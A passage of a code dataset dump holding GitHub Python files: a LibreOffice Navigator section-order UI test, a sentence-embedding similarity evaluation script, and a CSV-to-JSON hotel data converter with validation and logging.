var\r\n\r\n","repo_name":"hadrien-de-march/MOT_resolution","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":62120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29169664490","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n#\n# This file is part of the LibreOffice project.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n\nfrom uitest.framework import UITestCase\nfrom libreoffice.uno.propertyvalue import mkPropertyValues\nfrom uitest.uihelper.common import get_state_as_dict, get_url_for_data_file\n\nclass tdf40427(UITestCase):\n\n def get_item(self, xTree, name):\n for i in xTree.getChildren():\n xItem = xTree.getChild(i)\n if name == get_state_as_dict(xItem)['Text']:\n return xItem\n\n def expand_all(self, xTreeItem):\n count = len(xTreeItem.getChildren())\n for i in xTreeItem.getChildren():\n xTreeItem.getChild(i).executeAction(\"EXPAND\", ())\n count += self.expand_all(xTreeItem.getChild(i))\n return count\n\n def get_names(self, xTreeItem):\n names = []\n for i in xTreeItem.getChildren():\n names.append(get_state_as_dict(xTreeItem.getChild(str(i)))['Text'])\n names += self.get_names(xTreeItem.getChild(i))\n return names\n\n def test_tdf40427(self):\n with self.ui_test.load_file(get_url_for_data_file(\"tdf40427_SectionPositions.odt\")) as document:\n xMainWindow = self.xUITest.getTopFocusWindow()\n xWriterEdit = xMainWindow.getChild(\"writer_edit\")\n\n self.assertEqual(2, document.CurrentController.PageCount)\n\n # Make sure that the view is 2 pages side-by-side - look at dialog View-Zoom-Zoom\n with self.ui_test.execute_dialog_through_command(\".uno:Zoom\") as xDialog:\n\n columnssb = xDialog.getChild(\"columnssb\")\n columns = xDialog.getChild(\"columns\")\n bookmode = xDialog.getChild(\"bookmode\")\n self.assertEqual(\"true\", get_state_as_dict(columns)[\"Checked\"])\n self.assertEqual(\"2\", get_state_as_dict(columnssb)[\"Text\"])\n self.assertEqual(\"false\", get_state_as_dict(bookmode)[\"Selected\"])\n\n\n # In this view, the sections \"SectionB\" and \"SectionC\" on second page are positioned on screen\n # higher than \"SectionY\" and \"SectionA\" respectively; there are nested and anchored sections.\n # Make sure that order in Navigator follows their relative position in document, not vertical\n # position on screen, nor sorted alphabetically. Sections in flying frames are sorted by their\n # anchor position in the document.\n\n self.xUITest.executeCommand(\".uno:Sidebar\")\n xWriterEdit.executeAction(\"SIDEBAR\", mkPropertyValues({\"PANEL\": \"SwNavigatorPanel\"}))\n\n # wait until the navigator panel is available\n xNavigatorPanel = self.ui_test.wait_until_child_is_available('NavigatorPanel')\n\n xContentTree = xNavigatorPanel.getChild(\"contenttree\")\n xSections = self.get_item(xContentTree, 'Sections')\n self.assertEqual('Sections', get_state_as_dict(xSections)['Text'])\n xSections.executeAction(\"EXPAND\", ())\n totalSectionsCount = self.expand_all(xSections)\n\n refSectionNames = [\n 'SectionZ',\n 'SectionY', # SectionB should not get before this, despite its Y position on screen is higher\n 'SectionT3', # Sections in tables go in rows, then across rows\n 'SectionT1',\n 'SectionT2',\n 'SectionT0',\n 'SectionF2', # Goes before SectionF1, because their fly anchors go in that order\n 'SectionF3', # Same as SectionF1, but anchor section is in fly itself\n 'SectionFinF3', # Check order of nested sections inside fly\n 'SectionA',\n 'SectionF1', # Section in fly anchored in a section goes immediately after its anchor section\n 'SectionB', # High on screen, but late in list because it's on second page\n 'SectionC',\n ]\n self.assertEqual(len(refSectionNames), totalSectionsCount)\n\n actSectionNames = self.get_names(xSections)\n\n # Without the fix in place, this would fail with\n # AssertionError: Lists differ: ['SectionZ', 'SectionY', 'SectionT3', 'SectionT1', 'SectionT2'[100 chars]onC'] != ['SectionZ', 'SectionB', 'SectionF3', 'SectionFinF3', 'Section[100 chars]onA']\n self.assertEqual(refSectionNames, actSectionNames)\n\n self.xUITest.executeCommand(\".uno:Sidebar\")\n\n# vim: set shiftwidth=4 softtabstop=4 expandtab:\n","repo_name":"LibreOffice/core","sub_path":"sw/qa/uitest/navigator/tdf40427.py","file_name":"tdf40427.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":2194,"dataset":"github-code","pt":"52"} +{"seq_id":"9764198255","text":"import sentencepiece as spm\nimport numpy as np\nfrom sacremoses import MosesTokenizer\n\ndef cosine(u, v):\n return np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))\n\nclass FileSim(object):\n\n def __init__(self):\n self.similarity = lambda s1, s2: np.nan_to_num(cosine(np.nan_to_num(s1), np.nan_to_num(s2)))\n\n def score(self, params, batcher, f):\n f = open(f, 'r')\n lines = f.readlines()\n input1 = []\n input2 = []\n for i in lines:\n i = i.strip().split(\"\\t\")\n s1 = i[0].strip()\n s2 = i[1].strip()\n input1.append(s1)\n input2.append(s2)\n sys_scores = []\n for ii in range(0, len(input1), params.batch_size):\n batch1 = input1[ii:ii + params.batch_size]\n batch2 = input2[ii:ii + params.batch_size]\n\n # we assume get_batch already throws out the faulty ones\n if len(batch1) == len(batch2) and len(batch1) > 0:\n enc1 = batcher(params, batch1)\n enc2 = batcher(params, batch2)\n\n for kk in range(enc2.shape[0]):\n sys_score = self.similarity(enc1[kk], enc2[kk])\n sys_scores.append(sys_score)\n\n return sys_scores\n\ndef batcher(params, batch):\n batch = [\" \".join(s) for s in batch]\n new_batch = []\n for p in batch:\n if params.tokenize:\n tok = params.entok.tokenize(p, escape=False)\n p = \" \".join(tok)\n p = p.lower()\n p = params.sp.EncodeAsPieces(p)\n p = \" \".join(p)\n new_batch.append(p)\n vecs = params.embedder.embed(new_batch, params.encoder)\n return vecs\n\ndef evaluate(embedder, args):\n\n sp = spm.SentencePieceProcessor()\n sp.Load(args.sentencepiece)\n\n entok = MosesTokenizer(lang='en')\n\n from argparse import Namespace\n\n new_args = Namespace(batch_size=32, entok=entok, sp=sp, embedder=embedder,\n encoder=args.eval_encoder, tokenize=args.tokenize)\n\n s = FileSim()\n scores = s.score(new_args, batcher, args.sim_file)\n\n f = open(args.sim_file, 'r')\n lines = f.readlines()\n\n for i in range(len(scores)):\n print(lines[i].strip() + \"\\t{0}\".format(scores[i]))\n\n\nif __name__ == '__main__':\n\n from embed import Embedder\n from fairseq import options\n\n parser = options.get_generation_parser(interactive=True)\n args = options.parse_args_and_arch(parser)\n\n embedder = Embedder(args)\n\n evaluate(embedder, args)\n","repo_name":"jwieting/bilingual-generative-transformer","sub_path":"evaluate_list.py","file_name":"evaluate_list.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"23712423834","text":"#!/usr/bin/env python\n\"\"\"\nScript to convert CSV input data in JSON\n\"\"\"\nfrom __future__ import print_function, division\nimport sys\nimport operator\nimport csv\nimport logging\nimport timeit\nimport t4c.t4c_exceptions as t4c_ex\nimport t4c.validate as validate\nimport t4c.util as util\n\n# ---\n# TODO unit test (pytest)\n# TODO support yaml - pyYaml\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)\nLOGGER = logging.getLogger(__name__)\n\n\ndef read_and_parse(source_file, complex_url_validation):\n \"\"\"\n Reads source `filename` and returns a tuple with 2 elements\n 0 - list with CSV Fields names\n 1 - List of Dicts with all the row-elements\n It raises IOError exception `filename` cannot be read\n \"\"\"\n try:\n with open(source_file, mode='r') as hotels_file:\n reader = csv.DictReader(hotels_file, delimiter=',')\n data = []\n not_valid = []\n for row in reader:\n try:\n LOGGER.debug(str(len(data)) + ' - ' + row['name'] + ' - ' + row['uri'])\n data.append(validate_data(row, complex_url_validation))\n # for test\n # if len(data) >= 100:\n # break\n\n except t4c_ex.GenericT4cError:\n not_valid.append(row)\n return reader.fieldnames, data, not_valid\n except IOError as ioe:\n raise IOError(\"!!! - ooops I cannot read {} or it does not exists\".format(ioe.filename))\n\n\ndef validate_data(current_row, complex_url_validation):\n \"\"\" this function is currently quite 'dumb'\n using hard-coded values and triggering the right validation \"\"\"\n try:\n current_row['name'] = util.is_a_utf8_string(current_row['name'])\n current_row['address'] = current_row['address']\n current_row['stars'] = validate.rating_validation(current_row['stars'])\n current_row['contact'] = current_row['contact']\n current_row['phone'] = current_row['phone']\n current_row['uri'] = validate.url_validation(current_row['uri'], complex_url_validation)\n return current_row\n except (t4c_ex.StarsValidationError, t4c_ex.UriValidationError, t4c_ex.NotUTF8Error) as exc:\n LOGGER.error(exc.message)\n raise t4c_ex.GenericT4cError\n\n\ndef write_data(data_parsed, destination_json, sort_by_field, fields_name):\n \"\"\"The method that writes data in JSON files\n and check for sorting field\"\"\"\n if sort_by_field != 'None':\n data_parsed.sort(key=operator.itemgetter(\n validate.field_exists_in_csv_fields(sort_by_field, fields_name)))\n util.write_json_to_file(data_parsed, destination_json)\n\n\ndef main():\n \"\"\"The main method \"\"\"\n\n args = util.args_parser.parse_cli()\n destination_json = args.destination_file\n failed_validation_file = util.file_checks.get_invalid_hotels_file()\n source_file = args.source_file\n sort_by_field = str(args.sort_by_field)\n overwrite_destination = validate.cast_str_2_boolean_argument(args.overwrite_destination_file)\n complex_url_validation = validate.cast_str_2_boolean_argument(args.complex_url_validation)\n\n if LOGGER.level == logging.DEBUG:\n for arg in vars(args):\n LOGGER.info(\"Starting with parameters: {} - {}\".format(arg, getattr(args, arg)))\n LOGGER.info(\"\\n################################\\n\")\n\n util.write_existing_file(overwrite_destination, destination_json)\n\n st1 = timeit.default_timer()\n # let's crack this down :)\n data_read_and_parsed = read_and_parse(source_file, complex_url_validation)\n fields_name = data_read_and_parsed[0]\n data_processed = data_read_and_parsed[1]\n data_failed_validation = data_read_and_parsed[2]\n\n # Finally Write data\n write_data(data_processed,\n destination_json, sort_by_field, fields_name)\n # for the time being to make it simple, Always overwrite invalid hotels' file\n write_data(data_failed_validation,\n failed_validation_file, sort_by_field, fields_name)\n\n st2 = timeit.default_timer()\n\n LOGGER.info('\\n\\n#############################################')\n LOGGER.info(\"I saved and validated {} hotels in {} seconds\"\n .format(len(data_read_and_parsed[1]), st2-st1))\n LOGGER.info(\"Unfortunately {} hotels did not pass the validation\"\n .format(len(data_failed_validation)))\n LOGGER.info(\"You can find all the generated data inside {}\".format(util.get_data_folder()))\n\n\nif __name__ == '__main__':\n try:\n t1 = timeit.default_timer()\n main()\n LOGGER.info(\"Overall script took: {} seconds\".format(timeit.default_timer() - t1))\n except (GeneratorExit, IOError, RuntimeError) as error:\n print(error)\n sys.exit(1)\n","repo_name":"zimaldone/t4c","sub_path":"t4c.py","file_name":"t4c.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}